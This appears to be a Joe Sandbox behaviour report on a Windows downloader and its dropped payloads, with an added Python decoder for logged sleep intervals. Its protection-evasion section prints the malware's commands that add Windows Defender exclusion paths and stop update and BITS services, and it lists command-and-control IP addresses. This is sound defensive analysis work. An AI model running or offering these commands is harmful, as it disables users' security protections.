Source: C:\Windows\sysppvrdnvs.exe -- Code function: 17_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- Code function: 1_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect
Source: C:\Windows\sysppvrdnvs.exe -- Thread delayed: delay time: 40000
Source: C:\Windows\sysppvrdnvs.exe -- Thread delayed: delay time: 53205
Source: C:\Windows\sysppvrdnvs.exe -- Thread delayed: delay time: 31490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000130E000.00000004.00000020.00020000.00000000.sdmp, Bjl3geiFEK.exe, 00000000.00000002.1807520857.0000000001379000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903094197.000000000065F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000069F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1937078841.000000000069F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903094197.000000000069F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903798515.000000000065F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903798515.000000000069F000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW
Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903094197.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903798515.0000000000688000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAWF2od
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- API call chain: ExitProcess graph end node (graph_1-4452)
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- API call chain: ExitProcess graph end node (graph_1-4464)
Source: C:\Windows\sysppvrdnvs.exe -- API call chain: ExitProcess graph end node (graph_17-4495)
Source: C:\Windows\sysppvrdnvs.exe -- API call chain: ExitProcess graph end node (graph_17-4464)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe -- Code function: 0_2_004B1DE8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe -- Code function: 0_2_004B10B0 Sleep,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- Code function: 1_2_0040A890 GetProcessHeaps
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Process token adjusted: Debug
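The sleep rows in this section are printed with negative values because NtDelayExecution takes a signed 64-bit interval in 100 ns ticks, negative meaning "relative to now". The PowerShell value 922337203685477 is exactly 2^63 / 10^4 in milliseconds, which is the interval kernelbase's SleepEx uses for INFINITE, so that thread is blocked indefinitely rather than running an evasion sleep (my inference from the arithmetic, not a statement of the report). The decoder below is an added example, not part of the report; the thread trace it runs on is constructed, and the thresholds are the ones the report itself applies (30000 and a count of 30).

```python
"""Decode NtDelayExecution intervals and classify the sleeps a sandbox logs.

Added example, not part of the Joe Sandbox report.  The encoding is the
kernel ABI: signed 64-bit count of 100 ns ticks, negative = relative delay,
positive = absolute time, 0x8000000000000000 = what SleepEx passes for
INFINITE.  SAMPLE_TRACE is constructed; the thresholds are the report's own.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

TICKS_PER_MS = 10_000                       # 100 ns per tick
INT64_MIN = -(1 << 63)                      # Sleep(INFINITE) interval
INFINITE_MS = (1 << 63) // TICKS_PER_MS     # 922337203685477, the value the report shows
LONG_SLEEP_MS = 30_000                      # report: "Thread sleep time ... >= 30000"
SLEEP_COUNT_LIMIT = 30                      # report: "Thread sleep count ... > 30"


def decode_delay_interval(raw: int) -> Dict:
    """Translate one DelayInterval into kind + milliseconds."""
    if raw == INT64_MIN:
        return {"kind": "infinite", "ms": INFINITE_MS}
    if raw < 0:
        return {"kind": "relative", "ms": -raw // TICKS_PER_MS}
    if raw == 0:
        return {"kind": "yield", "ms": 0}
    # Positive: absolute FILETIME (ticks since 1601-01-01); the real delay depends on "now".
    return {"kind": "absolute", "ms": raw // TICKS_PER_MS}


def classify_threads(trace: List[Tuple[int, int]]) -> Dict[int, Dict]:
    """trace = (tid, raw_interval) in call order -> per-thread totals and a verdict."""
    per: Dict[int, Dict] = defaultdict(lambda: {"count": 0, "total_ms": 0, "infinite": 0})
    for tid, raw in trace:
        d = decode_delay_interval(raw)
        if d["kind"] == "infinite":
            per[tid]["infinite"] += 1
        elif d["kind"] == "relative":
            per[tid]["count"] += 1
            per[tid]["total_ms"] += d["ms"]
    for t in per.values():
        if t["infinite"] and t["count"] == 0:
            t["verdict"] = "blocking wait, not a timed sleep"
        elif t["total_ms"] >= LONG_SLEEP_MS or t["count"] > SLEEP_COUNT_LIMIT:
            t["verdict"] = "long or looped sleep: possible sandbox time-out evasion"
        else:
            t["verdict"] = "benign"
    return dict(per)


# Constructed trace shaped like the report's threads: a 100-iteration 400 ms loop
# (40 s total), one 53.205 s sleep, one infinite wait, and a short benign thread.
SAMPLE_TRACE: List[Tuple[int, int]] = (
    [(340, -400 * TICKS_PER_MS)] * 100
    + [(4180, -53_205 * TICKS_PER_MS)]
    + [(7020, INT64_MIN)]
    + [(9999, -100 * TICKS_PER_MS)] * 3
)

if __name__ == "__main__":
    for tid, summary in classify_threads(SAMPLE_TRACE).items():
        print(tid, summary)
```

The split matters for triage: the sysppvrdnvs.exe threads that sleep past 30 s and the 111-iteration loop are the behaviour a sandbox shortens its run for, while the PowerShell infinite wait is ordinary blocking in a child process and should not be counted as evasion by the same rule.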

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeProcess created: C:\Users\user\AppData\Local\Temp\33080.scr "C:\Users\user\AppData\Local\Temp\33080.scr" /SJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /waitJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauservJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /waitJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: GetLocaleInfoA,strcmp,1_2_0040F1B0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: GetLocaleInfoA,strcmp,2_2_0040F1B0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: GetLocaleInfoA,strcmp,17_2_0040F1B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe | Code function: 0_2_004B1D18 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004B1D18

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\sysppvrdnvs.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverride
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait

Remote Access Functionality

Source: Yara match | File source: 18.0.818921588.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.33080.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.33080.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.818921588.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 33080.scr PID: 7112, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysppvrdnvs.exe PID: 3060, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysppvrdnvs.exe PID: 4628, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 818921588.exe PID: 1516, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe, type: DROPPED
Source: Yara match | File source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\33080.scr, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\818921588.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\33080.scr | Code function: 1_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,1_2_00401470
Source: C:\Users\user\AppData\Local\Temp\33080.scr | Code function: 1_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,1_2_00402020
Source: C:\Users\user\AppData\Local\Temp\33080.scr | Code function: 1_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,1_2_0040E190
Source: C:\Users\user\AppData\Local\Temp\33080.scr | Code function: 1_2_004013B0 CreateEventA,socket,bind,CreateThread,1_2_004013B0
Source: C:\Windows\sysppvrdnvs.exe | Code function: 2_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,2_2_00401470
Source: C:\Windows\sysppvrdnvs.exe | Code function: 2_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,2_2_00402020
Source: C:\Windows\sysppvrdnvs.exe | Code function: 2_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,2_2_0040E190
Source: C:\Windows\sysppvrdnvs.exe | Code function: 2_2_004013B0 CreateEventA,socket,bind,CreateThread,2_2_004013B0
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,17_2_00401470
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,17_2_00402020
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,17_2_0040E190
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_004013B0 CreateEventA,socket,bind,CreateThread,17_2_004013B0
MITRE ATT&CK matrix, listed per tactic column (a number before a technique is the count displayed in the report for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Windows Management Instrumentation; 12 Native API; 2 Command and Scripting Interpreter; 1 Service Execution; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; 11 Windows Service; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 11 Windows Service; 11 Process Injection; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 3 Disable or Modify Tools; 1 Obfuscated Files or Information; 1 DLL Side-Loading; 221 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Hidden Files and Directories; Indicator Removal from Tools
Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 1 System Network Connections Discovery; 2 File and Directory Discovery; 44 System Information Discovery; 241 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 11 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 32 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 21 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1543742 | Sample: Bjl3geiFEK.exe | Startdate: 28/10/2024 | Architecture: WINDOWS | Score: 100
Signatures at sample level: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 6 other signatures

Process tree recovered from the behavior graph:

• Bjl3geiFEK.exe (started)
  Network: 185.215.113.66 (ports 49730, 49731, 49734), WHOLESALECONNECTIONSNL, Portugal
  Dropped: C:\Users\user\AppData\Local\Temp\33080.scr (PE32); C:\Users\user\AppData\Local\...\tdrpl[1].exe (PE32)
  Signatures: Drops PE files with a suspicious file extension
  • 33080.scr (started)
    Dropped: C:\Windows\sysppvrdnvs.exe (PE32)
    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); 5 other signatures
    • sysppvrdnvs.exe (started)
      Network: 5.239.153.192 (port 40500), TCIIR, Iran (ISLAMIC Republic Of); 5.75.95.114 (port 40500), TCIIR, Iran (ISLAMIC Republic Of); 4 other IPs or domains
      Dropped: C:\Users\user\AppData\Local\...\818921588.exe (PE32); C:\Users\user\AppData\Local\...\264162301.exe (data); C:\Users\user\AppData\Local\...\229472814.exe (data)
      Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); 6 other signatures
      • cmd.exe (started)
        Signatures: Adds a directory exclusion to Windows Defender; Stops critical windows services
        • powershell.exe (started)
          Signatures: Loading BitLocker PowerShell Module
          • WmiPrvSE.exe (started)
        • conhost.exe (started)
      • 818921588.exe (started)
        Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
      • cmd.exe (started)
        • conhost.exe (started)
        • sc.exe (started)
        • sc.exe (started)
        • 3 other processes
• sysppvrdnvs.exe (started)

Source | Detection | Scanner | Label | Link
Bjl3geiFEK.exe | 11% | ReversingLabs | Win32.Downloader.Mint |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe | 100% | Avira | HEUR/AGEN.1315882 |
C:\Windows\sysppvrdnvs.exe | 100% | Avira | HEUR/AGEN.1315882 |
C:\Users\user\AppData\Local\Temp\33080.scr | 100% | Avira | HEUR/AGEN.1315882 |
C:\Users\user\AppData\Local\Temp\818921588.exe | 100% | Avira | HEUR/AGEN.1315882 |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe | 100% | Joe Sandbox ML | |
C:\Windows\sysppvrdnvs.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\33080.scr | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\818921588.exe | 100% | Joe Sandbox ML | |
